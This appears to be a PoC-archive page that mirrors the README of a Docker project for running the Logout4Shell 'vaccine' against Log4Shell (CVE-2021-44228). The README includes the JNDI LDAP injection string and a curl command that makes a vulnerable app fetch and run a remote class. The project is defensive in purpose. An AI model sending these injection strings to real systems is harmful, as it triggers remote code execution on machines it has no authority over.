关联漏洞
描述
docker compose solution to run a vaccine environment for the log4j2 vulnerability CVE-2021-44228
介绍
## Log4j Docker Vaccine
A containerized way to run the log4j vaccine offered by Cyberreason
- https://github.com/Cybereason/Logout4Shell
### Make it go
Clone this repo:
```bash
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git
```
Edit the containers.env file to hold an accurate private or public IP/DNS that your target can access. The default entry likely won't work for you!
Build and run the containers:
```bash
docker-compose -f docker-compose.yml -p vaccine up
```
You now have a listening ldap server that will serve up the Log4jRCE class to innoculate a vulnerable log4j instance.
You can expose this to the internet (if you like) by using ngrok.
- https://dashboard.ngrok.com/get-started/setup
```bash
ngrok tcp 1389
```
You can send a vulnerable log4j instance to this using the infamous jndi input string:
```
${jndi:ldap://<ngrokurlgoeshere>:1389/a}
```
## Testing
There is a purposefully vulnerable version of log4j in a container available at:
- https://github.com/christophetd/log4shell-vulnerable-app
You can follow their instructions to start it and use it for testing:
```
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
```
And trigger the innoculation via:
```
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
```
文件快照
[4.0K] /data/pocs/9f460f6fb5af00225a761520ad548c1bb4ffa780
├── [ 25] containers.env
├── [4.0K] docker
│ ├── [ 217] Dockerfile-ldapserver
│ ├── [ 213] Dockerfile-webserver
│ ├── [ 165] start_ldapserver.sh
│ └── [ 73] start_webserver.sh
├── [ 587] docker-compose.yml
├── [ 16K] LICENSE
└── [1.3K] README.md
1 directory, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。